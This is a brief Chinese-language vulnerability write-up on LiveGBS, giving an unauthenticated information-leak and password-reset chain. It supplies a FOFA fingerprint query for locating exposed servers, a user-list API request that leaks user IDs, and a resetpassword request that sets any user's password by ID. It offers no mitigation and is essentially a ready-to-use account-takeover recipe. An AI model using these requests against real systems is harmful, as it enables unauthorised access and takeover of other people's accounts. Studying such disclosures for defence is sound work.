L21-1LiveGBS–InformationLeakage

漏洞描述：

LiveGBS部分接口存在未授权访问导致，可以通过组合漏洞修改任意用户密码

fofa语法：

icon_hash=“-206100324”

漏洞复现：

敏感信息泄露，获取用户 i d
payload：

/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc

通过 i d 更改用户密码
payload：

/api/v1/user/resetpassword?id=22&password=123456